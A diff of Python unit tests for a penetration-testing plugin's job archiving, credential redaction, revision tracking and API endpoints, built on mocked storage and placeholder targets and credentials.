self._make_pass(pass_nr=3, findings=[f_persistent, f_new]), + ] + agg = self._make_aggregated() + result = plugin._compute_ui_aggregate(passes, agg) + ft = result.to_dict()["finding_timeline"] + self.assertEqual(ft["persist1"]["first_seen"], 1) + self.assertEqual(ft["persist1"]["last_seen"], 3) + self.assertEqual(ft["persist1"]["pass_count"], 3) + self.assertEqual(ft["transient1"]["first_seen"], 1) + self.assertEqual(ft["transient1"]["last_seen"], 1) + self.assertEqual(ft["transient1"]["pass_count"], 1) + self.assertEqual(ft["new1"]["first_seen"], 3) + self.assertEqual(ft["new1"]["last_seen"], 3) + self.assertEqual(ft["new1"]["pass_count"], 1) + + def test_zero_findings(self): + """findings_count is {}, top_findings is [], total_findings is 0.""" + plugin, _ = self._make_plugin() + p = self._make_pass(findings=[]) + agg = self._make_aggregated() + result = plugin._compute_ui_aggregate([p], agg) + d = result.to_dict() + self.assertEqual(d["total_findings"], 0) + # findings_count and top_findings are None (stripped) when empty + self.assertNotIn("findings_count", d) + self.assertNotIn("top_findings", d) + + def test_open_ports_sorted_unique(self): + """total_open_ports is deduped and sorted.""" + plugin, _ = self._make_plugin() + p = self._make_pass(findings=[]) + agg = self._make_aggregated(open_ports=[443, 80, 443, 22, 80]) + result = plugin._compute_ui_aggregate([p], agg) + self.assertEqual(result.to_dict()["total_open_ports"], [22, 80, 443]) + + def test_count_services(self): + """_count_services counts ports with at least one detected service.""" + plugin, _ = self._make_plugin() + service_info = { + "80": {"_service_info_http": {}, "_web_test_xss": {}}, + "443": {"_service_info_https": {}, "_service_info_http": {}}, + } + self.assertEqual(plugin._count_services(service_info), 2) + self.assertEqual(plugin._count_services({}), 0) + self.assertEqual(plugin._count_services(None), 0) + + def test_webapp_graybox_fields_populated(self): + """Webapp aggregates include scan_type, discovery counts, and scenario stats.""" + plugin, _ = self._make_plugin() + p = self._make_pass( + findings=[self._make_finding(severity="HIGH", finding_id="gb1")], + worker_reports={"w1": {"start_port": 443, "end_port": 443, "open_ports": [443]}}, + ) + p["scan_metrics"] = { + "scenarios_total": 3, + "scenarios_vulnerable": 1, + } + agg = self._make_webapp_aggregated() + + result = plugin._compute_ui_aggregate([p], agg, job_config={"scan_type": "webapp"}).to_dict() + self.assertEqual(result["scan_type"], "webapp") + self.assertEqual(result["total_routes_discovered"], 2) + self.assertEqual(result["total_forms_discovered"], 2) + self.assertEqual(result["total_scenarios"], 3) + self.assertEqual(result["total_scenarios_vulnerable"], 1) + + + +class TestPhase3Archive(unittest.TestCase): + """Phase 3: Job Close & Archive.""" + + @classmethod + def _mock_plugin_modules(cls): + if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: + return + mock_plugin_modules() + + def _get_plugin_class(self): + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + return PentesterApi01Plugin + + def _build_archive_plugin(self, job_id="test-job", pass_count=1, run_mode="SINGLEPASS", + job_status="FINALIZED", r1fs_write_fail=False, r1fs_verify_fail=False): + """Build a mock plugin pre-configured for _build_job_archive testing.""" + plugin = MagicMock() + plugin.ee_addr = "launcher-node" + plugin.ee_id = "launcher-alias" + plugin.cfg_instance_id = "test-instance" + plugin.time.return_value = 1000200.0 + plugin.json_dumps.return_value = "{}" + + # R1FS mock + plugin.r1fs = MagicMock() + + # Build pass report dicts and refs + pass_reports_data = [] + pass_report_refs = [] + for i in range(1, pass_count + 1): + pr = { + "pass_nr": i, + "date_started": 1000000.0 + (i - 1) * 100, + "date_completed": 1000000.0 + i * 100, + "duration": 100.0, + "aggregated_report_cid": f"QmAgg{i}", + "worker_reports": { + "worker-A": {"report_cid": f"QmWorker{i}A", "start_port": 1, "end_port": 512, "ports_scanned": 512, "open_ports": [80], "nr_findings": 2}, + }, + "risk_score": 25 + i, + "risk_breakdown": {"findings_score": 10}, + "findings": [ + {"finding_id": f"f{i}a", "severity": "HIGH", "confidence": "firm", "title": f"Finding {i}A"}, + {"finding_id": f"f{i}b", "severity": "MEDIUM", "confidence": "firm", "title": f"Finding {i}B"}, + ], + "scan_metrics": { + "scenarios_total": 2, + "scenarios_vulnerable": 1, + }, + "quick_summary": f"Summary for pass {i}", + } + pass_reports_data.append(pr) + pass_report_refs.append({"pass_nr": i, "report_cid": f"QmPassReport{i}", "risk_score": 25 + i}) + + # Job config + job_config = { + "target": "example.com", "start_port": 1, "end_port": 1024, + "run_mode": run_mode, "enabled_features": [], "scan_type": "webapp", + "target_url": "https://example.com/app", + "redact_credentials": True, + "official_username": "admin", + "official_password": "super-secret", + "regular_username": "user", + "regular_password": "user-pass", + "weak_candidates": ["admin:admin", "user:user"], + } + + # Latest aggregated data + latest_aggregated = { + "open_ports": [80, 443], + "service_info": { + "80": {"_service_info_http": {}}, + "443": { + "_graybox_discovery": { + "routes": ["/login", "/admin", "/login"], + "forms": [ + {"action": "/login", "method": "POST"}, + {"action": "/admin", "method": "POST"}, + {"action": "/admin", "method": "POST"}, + ], + }, + }, + }, + "web_tests_info": {}, + "graybox_results": { + "443": { + "_graybox_test": { + "findings": [ + {"scenario_id": "S1", "status": "vulnerable"}, + {"scenario_id": "S2", "status": "not_vulnerable"}, + ], + }, + }, + }, + "completed_tests": ["port_scan"], + "ports_scanned": 1024, + } + + # R1FS get_json: return the right data for each CID + cid_map = {"QmConfigCID": job_config} + for i, pr in enumerate(pass_reports_data): + cid_map[f"QmPassReport{i+1}"] = pr + cid_map[f"QmAgg{i+1}"] = latest_aggregated + + if r1fs_write_fail: + plugin.r1fs.add_json.return_value = None + else: + archive_cid = "QmArchiveCID" + plugin.r1fs.add_json.return_value = archive_cid + if r1fs_verify_fail: + # add_json succeeds but get_json for the archive CID returns None + orig_map = dict(cid_map) + def verify_fail_get(cid): + if cid == archive_cid: + return None + return orig_map.get(cid) + plugin.r1fs.get_json.side_effect = verify_fail_get + else: + # Verification succeeds — archive CID also returns data + cid_map[archive_cid] = {"job_id": job_id} # minimal archive for verification + plugin.r1fs.get_json.side_effect = lambda cid: cid_map.get(cid) + + if not r1fs_write_fail and not r1fs_verify_fail: + plugin.r1fs.get_json.side_effect = lambda cid: cid_map.get(cid) + + # Job specs (running state) + job_specs = { + "job_id": job_id, + "job_status": job_status, + "job_pass": pass_count, + "run_mode": run_mode, + "launcher": "launcher-node", + "launcher_alias": "launcher-alias", + "target": "example.com", + "scan_type": "webapp", + "target_url": "https://example.com/app", + "task_name": "Test", + "start_port": 1, + "end_port": 1024, + "date_created": 1000000.0, + "risk_score": 25 + pass_count, + "job_config_cid": "QmConfigCID", + "workers": { + "worker-A": {"start_port": 1, "end_port": 512, "finished": True, "report_cid": "QmReportA"}, + }, + "timeline": [ + {"type": "created", "label": "Created", "date": 1000000.0, "actor": "launcher-alias", "actor_type": "system", "meta": {}}, + ], + "pass_reports": pass_report_refs, + } + + plugin.chainstore_hset = MagicMock() + + # Bind real methods for archive building + Plugin = self._get_plugin_class() + plugin._compute_ui_aggregate = lambda passes, agg, job_config=None: Plugin._compute_ui_aggregate( + plugin, passes, agg, job_config=job_config + ) + plugin._count_services = lambda si: Plugin._count_services(plugin, si) + plugin._dedupe_items = lambda items: Plugin._dedupe_items(items) + plugin._extract_graybox_ui_stats = lambda aggregated, latest_pass=None: Plugin._extract_graybox_ui_stats( + plugin, aggregated, latest_pass + ) + plugin.SEVERITY_ORDER = Plugin.SEVERITY_ORDER + plugin.CONFIDENCE_ORDER = Plugin.CONFIDENCE_ORDER + plugin._redact_job_config = lambda d: Plugin._redact_job_config(d) + + return plugin, job_specs, pass_reports_data, job_config + + def test_archive_written_to_r1fs(self): + """Archive stored in R1FS with job_id, job_config, passes, ui_aggregate.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, job_config = self._build_archive_plugin() + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + # r1fs.add_json called with archive dict + self.assertTrue(plugin.r1fs.add_json.called) + archive_dict = plugin.r1fs.add_json.call_args[0][0] + self.assertEqual(archive_dict["archive_version"], JOB_ARCHIVE_VERSION) + self.assertEqual(archive_dict["job_id"], "test-job") + self.assertEqual(archive_dict["job_config"]["target"], "example.com") + self.assertEqual(len(archive_dict["passes"]), 1) + self.assertIn("ui_aggregate", archive_dict) + self.assertIn("total_open_ports", archive_dict["ui_aggregate"]) + + def test_archive_ui_aggregate_includes_graybox_summary(self): + """Archive UI aggregate preserves graybox scan metadata and scenario counts.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin() + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + archive_dict = plugin.r1fs.add_json.call_args[0][0] + ui = archive_dict["ui_aggregate"] + self.assertEqual(ui["scan_type"], "webapp") + self.assertEqual(ui["total_routes_discovered"], 2) + self.assertEqual(ui["total_forms_discovered"], 2) + self.assertEqual(ui["total_scenarios"], 2) + self.assertEqual(ui["total_scenarios_vulnerable"], 1) + + def test_archive_redacts_job_config_credentials(self): + """Archived job_config masks credentials when redact_credentials is enabled.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin() + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + archive_dict = plugin.r1fs.add_json.call_args[0][0] + self.assertEqual(archive_dict["job_config"]["official_password"], "***") + self.assertEqual(archive_dict["job_config"]["regular_password"], "***") + self.assertEqual(archive_dict["job_config"]["weak_candidates"], ["***", "***"]) + self.assertEqual(archive_dict["job_config"]["official_username"], "admin") + + def test_archive_redaction_removes_secret_ref(self): + """Archived job_config does not expose secret_ref references.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin() + plugin.r1fs.get_json.side_effect = [ + { + "target": "example.com", + "start_port": 443, + "end_port": 443, + "run_mode": "SINGLEPASS", + "scan_type": "webapp", + "target_url": "https://example.com/app", + "redact_credentials": True, + "secret_ref": "QmSecretCID", + "official_username": "", + }, + { + "pass_nr": 1, + "date_started": 1, + "date_completed": 2, + "duration": 1, + "aggregated_report_cid": "QmAgg", + "worker_reports": {}, + "risk_score": 0, + }, + {"open_ports": [], "service_info": {}, "web_tests_info": {}}, + {"job_id": "test-job"}, + ] + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + archive_dict = plugin.r1fs.add_json.call_args[0][0] + self.assertNotIn("secret_ref", archive_dict["job_config"]) + + def test_archive_duration_computed(self): + """duration == date_completed - date_created, not 0.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin() + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + archive_dict = plugin.r1fs.add_json.call_args[0][0] + # date_created=1000000, time()=1000200 → duration=200 + self.assertEqual(archive_dict["duration"], 200.0) + self.assertGreater(archive_dict["duration"], 0) + + def test_stub_has_job_cid_and_config_cid(self): + """After prune, CStore stub has job_cid and job_config_cid.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin() + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + # Extract the stub written to CStore + hset_call = plugin.chainstore_hset.call_args + stub = hset_call[1]["value"] + self.assertEqual(stub["job_cid"], "QmArchiveCID") + self.assertEqual(stub["job_config_cid"], "QmConfigCID") + self.assertEqual(stub["scan_type"], "webapp") + self.assertEqual(stub["target_url"], "https://example.com/app") + + def test_stub_fields_match_model(self): + """Stub has exactly CStoreJobFinalized fields.""" + from extensions.business.cybersec.red_mesh.models import CStoreJobFinalized + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin() + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + stub = plugin.chainstore_hset.call_args[1]["value"] + # Verify it can be loaded into CStoreJobFinalized + finalized = CStoreJobFinalized.from_dict(stub) + self.assertEqual(finalized.job_id, "test-job") + self.assertEqual(finalized.job_status, "FINALIZED") + self.assertEqual(finalized.target, "example.com") + self.assertEqual(finalized.scan_type, "webapp") + self.assertEqual(finalized.target_url, "https://example.com/app") + self.assertEqual(finalized.pass_count, 1) + self.assertEqual(finalized.worker_count, 1) + self.assertEqual(finalized.start_port, 1) + self.assertEqual(finalized.end_port, 1024) + self.assertGreater(finalized.duration, 0) + + def test_pass_report_cids_cleaned_up(self): + """After archive, individual pass CIDs deleted from R1FS.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin() + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + # Check delete_file was called for pass report CID + delete_calls = [c[0][0] for c in plugin.r1fs.delete_file.call_args_list] + self.assertIn("QmPassReport1", delete_calls) + + def test_node_report_cids_preserved(self): + """Worker report CIDs NOT deleted.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin() + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + delete_calls = [c[0][0] for c in plugin.r1fs.delete_file.call_args_list] + self.assertNotIn("QmWorker1A", delete_calls) + + def test_aggregated_report_cids_preserved(self): + """aggregated_report_cid per pass NOT deleted.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin() + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + delete_calls = [c[0][0] for c in plugin.r1fs.delete_file.call_args_list] + self.assertNotIn("QmAgg1", delete_calls) + + def test_archive_write_failure_no_prune(self): + """R1FS write fails -> CStore untouched, full running state retained.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin(r1fs_write_fail=True) + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + # CStore should NOT have been pruned + plugin.chainstore_hset.assert_not_called() + # pass_reports still present in job_specs + self.assertEqual(len(job_specs["pass_reports"]), 1) + + def test_archive_verify_failure_no_prune(self): + """CID not retrievable -> CStore untouched.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin(r1fs_verify_fail=True) + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + plugin.chainstore_hset.assert_not_called() + + def test_archive_verify_retries_before_prune(self): + """Archive verification retries transient read-after-write failures before pruning CStore.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin() + plugin.cfg_archive_verify_retries = 3 + verify_attempts = {"count": 0} + orig_get = plugin.r1fs.get_json.side_effect + + def flaky_get(cid): + if cid == "QmArchiveCID": + verify_attempts["count"] += 1 + if verify_attempts["count"] < 3: + return None + return {"job_id": "test-job"} + return orig_get(cid) + + plugin.r1fs.get_json.side_effect = flaky_get + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + self.assertEqual(verify_attempts["count"], 3) + plugin.chainstore_hset.assert_called_once() + + def test_stuck_recovery(self): + """FINALIZED without job_cid -> _build_job_archive retried via _maybe_finalize_pass.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin(job_status="FINALIZED") + # Simulate stuck state: FINALIZED but no job_cid + job_specs["job_status"] = "FINALIZED" + # No job_cid in specs + + plugin.chainstore_hgetall.return_value = {"test-job": job_specs} + plugin._normalize_job_record = MagicMock(return_value=("test-job", job_specs)) + plugin._build_job_archive = MagicMock() + + Plugin._maybe_finalize_pass(plugin) + + plugin._build_job_archive.assert_called_once_with("test-job", job_specs) + + def test_idempotent_rebuild(self): + """Calling _build_job_archive twice doesn't corrupt state.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin() + + Plugin._build_job_archive(plugin, "test-job", job_specs) + first_stub = plugin.chainstore_hset.call_args[1]["value"] + + # Reset and call again (simulating a retry where data is still available) + plugin.chainstore_hset.reset_mock() + plugin.r1fs.add_json.reset_mock() + new_archive_cid = "QmArchiveCID2" + plugin.r1fs.add_json.return_value = new_archive_cid + + # Update get_json to also return data for the new archive CID + orig_side_effect = plugin.r1fs.get_json.side_effect + def extended_get(cid): + if cid == new_archive_cid: + return {"job_id": "test-job"} + return orig_side_effect(cid) + plugin.r1fs.get_json.side_effect = extended_get + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + second_stub = plugin.chainstore_hset.call_args[1]["value"] + # Both produce valid stubs + self.assertEqual(first_stub["job_id"], second_stub["job_id"]) + self.assertEqual(first_stub["pass_count"], second_stub["pass_count"]) + + def test_multipass_archive(self): + """Archive with 3 passes contains all pass data.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin(pass_count=3, run_mode="CONTINUOUS_MONITORING", job_status="STOPPED") + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + archive_dict = plugin.r1fs.add_json.call_args[0][0] + self.assertEqual(len(archive_dict["passes"]), 3) + self.assertEqual(archive_dict["passes"][0]["pass_nr"], 1) + self.assertEqual(archive_dict["passes"][2]["pass_nr"], 3) + stub = plugin.chainstore_hset.call_args[1]["value"] + self.assertEqual(stub["pass_count"], 3) + self.assertEqual(stub["job_status"], "STOPPED") + + + +class TestPhase5Endpoints(unittest.TestCase): + """Phase 5: API Endpoints.""" + + @classmethod + def _mock_plugin_modules(cls): + if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: + return + mock_plugin_modules() + + def _get_plugin_class(self): + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + return PentesterApi01Plugin + + def _build_finalized_stub(self, job_id="test-job"): + """Build a CStoreJobFinalized-shaped dict.""" + return { + "job_id": job_id, + "job_status": "FINALIZED", + "target": "example.com", + "scan_type": "webapp", + "target_url": "https://example.com/app", + "task_name": "Test", + "risk_score": 42, + "run_mode": "SINGLEPASS", + "duration": 200.0, + "pass_count": 1, + "launcher": "launcher-node", + "launcher_alias": "launcher-alias", + "worker_count": 2, + "start_port": 1, + "end_port": 1024, + "date_created": 1000000.0, + "date_completed": 1000200.0, + "job_cid": "QmArchiveCID", + "job_config_cid": "QmConfigCID", + } + + def _build_running_job(self, job_id="run-job", pass_count=8): + """Build a running job dict with N pass_reports.""" + pass_reports = [ + {"pass_nr": i, "report_cid": f"QmPass{i}", "risk_score": 10 + i} + for i in range(1, pass_count + 1) + ] + return { + "job_id": job_id, + "job_status": "RUNNING", + "scan_type": "webapp", + "target_url": "https://example.com/app", + "job_pass": pass_count, + "run_mode": "CONTINUOUS_MONITORING", + "launcher": "launcher-node", + "launcher_alias": "launcher-alias", + "target": "example.com", + "task_name": "Continuous Test", + "start_port": 1, + "end_port": 1024, + "date_created": 1000000.0, + "risk_score": 18, + "job_config_cid": "QmConfigCID", + "workers": { + "worker-A": {"start_port": 1, "end_port": 512, "finished": False}, + "worker-B": {"start_port": 513, "end_port": 1024, "finished": False}, + }, + "timeline": [ + {"type": "created", "label": "Created", "date": 1000000.0, "actor": "launcher", "actor_type": "system", "meta": {}}, + {"type": "started", "label": "Started", "date": 1000001.0, "actor": "launcher", "actor_type": "system", "meta": {}}, + ], + "pass_reports": pass_reports, + } + + def _build_plugin(self, jobs_dict): + """Build a mock plugin with given jobs in CStore.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.ee_addr = "launcher-node" + plugin.ee_id = "launcher-alias" + plugin.cfg_instance_id = "test-instance" + plugin.cfg_redmesh_secret_store_key = "unit-test-redmesh-secret-key" + plugin.r1fs = MagicMock() + + plugin.chainstore_hgetall.return_value = dict(jobs_dict) + plugin.chainstore_hget.side_effect = lambda hkey, key: jobs_dict.get(key) + plugin._normalize_job_record = MagicMock( + side_effect=lambda k, v: (k, v) if isinstance(v, dict) and v.get("job_id") else (None, None) + ) + + # Bind real methods so endpoint logic executes properly + plugin._get_all_network_jobs = lambda: Plugin._get_all_network_jobs(plugin) + plugin._get_job_from_cstore = lambda job_id: Plugin._get_job_from_cstore(plugin, job_id) + return plugin + + def test_get_job_archive_finalized(self): + """get_job_archive for finalized job returns archive with matching job_id.""" + Plugin = self._get_plugin_class() + stub = self._build_finalized_stub("fin-job") + plugin = self._build_plugin({"fin-job": stub}) + + archive_data = { + "archive_version": JOB_ARCHIVE_VERSION, + "job_id": "fin-job", + "passes": [{"findings": [{"finding_id": "f-1", "title": "Issue"}]}], + "ui_aggregate": {}, + "job_config": {}, + "timeline": [], + "duration": 0, + "date_created": 0, + "date_completed": 0, + } + plugin.r1fs.get_json.return_value = archive_data + plugin.chainstore_hgetall.side_effect = [ + {"fin-job": stub}, + {"fin-job:f-1": {"job_id": "fin-job", "finding_id": "f-1", "status": "accepted_risk", "note": "documented"}}, + ] + + result = Plugin.get_job_archive(plugin, job_id="fin-job") + self.assertEqual(result["job_id"], "fin-job") + self.assertEqual(result["archive"]["job_id"], "fin-job") + self.assertEqual(result["archive"]["archive_version"], JOB_ARCHIVE_VERSION) + self.assertEqual(result["archive"]["passes"][0]["findings"][0]["triage"]["status"], "accepted_risk") + + def test_get_job_archive_running(self): + """get_job_archive for running job returns not_available error.""" + Plugin = self._get_plugin_class() + running = self._build_running_job("run-job", pass_count=2) + plugin = self._build_plugin({"run-job": running}) + + result = Plugin.get_job_archive(plugin, job_id="run-job") + self.assertEqual(result["error"], "not_available") + + def test_get_job_archive_integrity_mismatch(self): + """Corrupted job_cid pointing to wrong archive is rejected.""" + Plugin = self._get_plugin_class() + stub = self._build_finalized_stub("fin-job") + plugin = self._build_plugin({"fin-job": stub}) + + # Archive has a different job_id + plugin.r1fs.get_json.return_value = { + "archive_version": JOB_ARCHIVE_VERSION, + "job_id": "other-job", + "passes": [], + "ui_aggregate": {}, + "job_config": {}, + "timeline": [], + "duration": 0, + "date_created": 0, + "date_completed": 0, + } + + result = Plugin.get_job_archive(plugin, job_id="fin-job") + self.assertEqual(result["error"], "integrity_mismatch") + + def test_get_job_archive_unsupported_version(self): + """Unsupported archive versions are rejected explicitly.""" + Plugin = self._get_plugin_class() + stub = self._build_finalized_stub("fin-job") + plugin = self._build_plugin({"fin-job": stub}) + + plugin.r1fs.get_json.return_value = { + "archive_version": JOB_ARCHIVE_VERSION + 1, + "job_id": "fin-job", + "passes": [], + "ui_aggregate": {}, + "job_config": {}, + "timeline": [], + "duration": 0, + "date_created": 0, + "date_completed": 0, + } + + result = Plugin.get_job_archive(plugin, job_id="fin-job") + self.assertEqual(result["error"], "unsupported_archive_version") + + def test_normalize_job_record_initializes_job_revision(self): + """Legacy records get a normalized integer job_revision.""" + Plugin = self._get_plugin_class() + plugin = self._build_plugin({}) + plugin._write_job_record = MagicMock(side_effect=lambda job_id, specs, context="": specs) + plugin._delete_job_record = MagicMock() + + normalized_key, normalized = Plugin._normalize_job_record(plugin, "job-1", {"job_id": "job-1", "workers": {}}) + + self.assertEqual(normalized_key, "job-1") + self.assertEqual(normalized["job_revision"], 0) + + def test_write_job_record_bumps_revision(self): + """Centralized job writes bump the revision counter.""" + Plugin = self._get_plugin_class() + plugin = self._build_plugin({}) + plugin.chainstore_hget.side_effect = None + plugin.chainstore_hget.return_value = {"job_id": "job-1", "job_revision": 2} + plugin.chainstore_hset = MagicMock() + plugin._log_audit_event = MagicMock() + plugin.P = MagicMock() + + updated = Plugin._write_job_record(plugin, "job-1", {"job_id": "job-1", "job_revision": 2}, context="test") + + self.assertEqual(updated["job_revision"], 3) + running = CStoreJobRunning.from_dict({ + "job_id": "job-1", + "job_status": "RUNNING", + "job_pass": 1, + "run_mode": "SINGLEPASS", + "launcher": "launcher-node", + "launcher_alias": "launcher-alias", + "target": "example.com", + "task_name": "Test", + "start_port": 1, + "end_port": 10, + "date_created": 1.0, + "job_config_cid": "QmConfig", + "workers": {}, + "timeline": [], + "pass_reports": [], + "job_revision": updated["job_revision"], + }) + self.assertEqual(running.job_revision, 3) + plugin._log_audit_event.assert_not_called() + + def test_job_write_guarantees_report_detection_only_mode(self): + """RedMesh exposes detection-only semantics when chainstore lacks CAS.""" + Plugin = self._get_plugin_class() + plugin = self._build_plugin({}) + + self.assertFalse(Plugin._supports_guarded_job_writes(plugin)) + self.assertEqual(Plugin._get_job_write_guarantees(plugin), { + "mode": "detection_only", + "guarded_writes": False, + "stale_write_detection": True, + "job_revision": True, + }) + + def test_write_job_record_logs_stale_write(self): + """Revision mismatches are logged as stale-write detections.""" + Plugin = self._get_plugin_class() + plugin = self._build_plugin({}) + plugin.chainstore_hget.side_effect = None + plugin.chainstore_hget.return_value = {"job_id": "job-1", "job_revision": 5} + plugin.chainstore_hset = MagicMock() + plugin._log_audit_event = MagicMock() + plugin.P = MagicMock() + + updated = Plugin._write_job_record(plugin, "job-1", {"job_id": "job-1", "job_revision": 3}, context="close_job") + + self.assertEqual(updated["job_revision"], 6) + plugin._log_audit_event.assert_called_once_with("stale_write_detected", { + "job_id": "job-1", + "expected_revision": 3, + "current_revision": 5, + "context": "close_job", + "write_mode": "detection_only", + }) + + def test_get_job_config_resolves_secret_ref_for_runtime(self): + """Runtime config loading resolves secret_ref into inline credentials.""" + Plugin = self._get_plugin_class() + plugin = self._build_plugin({}) + plugin.r1fs.get_json.side_effect = [ + { + "scan_type": "webapp", + "target_url": "https://example.com/app", + "secret_ref": "QmSecretCID", + "official_username": "", + "official_password": "", + "regular_username": "", + "regular_password": "", + }, + { + "kind": "redmesh_graybox_credentials", + "payload": { + "official_username": "admin", + "official_password": "secret", + "regular_username": "user", + "regular_password": "pass", + "weak_candidates": ["admin:admin"], + }, + }, + ] + + config = Plugin._get_job_config(plugin, {"job_config_cid": "QmConfigCID"}, resolve_secrets=True) + + self.assertEqual(config["official_username"], "admin") + self.assertEqual(config["official_password"], "secret") + self.assertEqual(config["regular_password"], "pass") + self.assertEqual(config["weak_candidates"], ["admin:admin"]) + self.assertNotIn("secret_ref", config) + self.assertEqual( + plugin.r1fs.get_json.call_args_list[1], + unittest.mock.call("QmSecretCID", secret="unit-test-redmesh-secret-key"), + ) + + def test_get_job_config_resolves_legacy_plaintext_secret_ref_without_key(self): + """Legacy plaintext secret refs remain readable as a compatibility fallback.""" + Plugin = self._get_plugin_class() + plugin = self._build_plugin({}) + plugin.cfg_redmesh_secret_store_key = "" + plugin.cfg_comms_host_key = "" + plugin.cfg_attestation = {"ENABLED": True, "PRIVATE_KEY": "", "MIN_SECONDS_BETWEEN_SUBMITS": 86400, "RETRIES": 2} + plugin.r1fs.get_json.side_effect = [ + { + "scan_type": "webapp", + "target_url": "https://example.com/app", + "secret_ref": "QmSecretCID", + }, + { + "kind": "redmesh_graybox_credentials", + "payload": { + "official_username": "admin", + "official_password": "secret", + }, + }, + ] + + config = Plugin._get_job_config(plugin, {"job_config_cid": "QmConfigCID"}, resolve_secrets=True) + + self.assertEqual(config["official_password"], "secret") + self.assertEqual( + plugin.r1fs.get_json.call_args_list[1], + unittest.mock.call("QmSecretCID"), + ) + + def test_get_job_data_running_last_5(self): + """Running job with 8 passes returns last 5 refs only.""" + Plugin = self._get_plugin_class() + running = self._build_running_job("run-job", pass_count=8) + plugin = self._build_plugin({"run-job": running}) + + result = Plugin.get_job_data(plugin, job_id="run-job") + self.assertTrue(result["found"]) + refs = result["job"]["pass_reports"] + self.assertEqual(len(refs), 5) + # Should be the last 5 (pass_nr 4-8) + self.assertEqual(refs[0]["pass_nr"], 4) + self.assertEqual(refs[-1]["pass_nr"], 8) + + def test_get_job_data_finalized_returns_stub(self): + """Finalized job returns stub as-is with job_cid.""" + Plugin = self._get_plugin_class() + stub = self._build_finalized_stub("fin-job") + plugin = self._build_plugin({"fin-job": stub}) + + result = Plugin.get_job_data(plugin, job_id="fin-job") + self.assertTrue(result["found"]) + self.assertEqual(result["job"]["job_cid"], "QmArchiveCID") + self.assertEqual(result["job"]["pass_count"], 1) + + def test_list_jobs_finalized_as_is(self): + """Finalized stubs returned unmodified with all CStoreJobFinalized fields.""" + Plugin = self._get_plugin_class() + stub = self._build_finalized_stub("fin-job") + plugin = self._build_plugin({"fin-job": stub}) + + result = Plugin.list_network_jobs(plugin) + self.assertIn("fin-job", result) + job = result["fin-job"] + self.assertEqual(job["job_cid"], "QmArchiveCID") + self.assertEqual(job["pass_count"], 1) + self.assertEqual(job["worker_count"], 2) + self.assertEqual(job["risk_score"], 42) + self.assertEqual(job["duration"], 200.0) + self.assertEqual(job["scan_type"], "webapp") + self.assertEqual(job["target_url"], "https://example.com/app") + + def test_list_jobs_running_stripped(self): + """Running jobs have counts but no timeline, workers, or pass_reports.""" + Plugin = self._get_plugin_class() + running = self._build_running_job("run-job", pass_count=3) + plugin = self._build_plugin({"run-job": running}) + + result = Plugin.list_network_jobs(plugin) + self.assertIn("run-job", result) + job = result["run-job"] + # Should have counts + self.assertEqual(job["pass_count"], 3) + self.assertEqual(job["worker_count"], 2) + self.assertEqual(job["scan_type"], "webapp") + self.assertEqual(job["target_url"], "https://example.com/app") + # Should NOT have heavy fields + self.assertNotIn("timeline", job) + self.assertNotIn("workers", job) + self.assertNotIn("pass_reports", job) + + def test_get_job_progress_returns_job_status(self): + """get_job_progress surfaces job_status from CStore job specs.""" + Plugin = self._get_plugin_class() + running = self._build_running_job("run-job", pass_count=2) + plugin = self._build_plugin({"run-job": running}) + plugin.chainstore_hgetall.return_value = { + "run-job:worker-A": { + "job_id": "run-job", + "worker_addr": "worker-A", + "pass_nr": running["job_pass"], + "assignment_revision_seen": 1, + "progress": 50, + "phase": "service_probes", + "ports_scanned": 50, + "ports_total": 100, + "open_ports_found": [], + "completed_tests": [], + "updated_at": 100.0, + "started_at": 90.0, + "first_seen_live_at": 90.0, + "last_seen_at": 100.0, + }, + } + plugin.time.return_value = 100.0 + + result = Plugin.get_job_progress(plugin, job_id="run-job") + self.assertEqual(result["status"], "RUNNING") + self.assertIn("worker-A", result["workers"]) + self.assertEqual(result["workers"]["worker-A"]["worker_state"], "active") + + def test_get_job_status_does_not_report_completed_when_distributed_job_is_incomplete(self): + """Local completion must not hide an unfinished assigned peer.""" + Plugin = self._get_plugin_class() + plugin = self._build_plugin({}) + plugin.lst_completed_jobs = ["job-1"] + plugin.completed_jobs_reports = { + "job-1": { + "local-1": {"target": "example.com", "ports_scanned": 10}, + }, + } 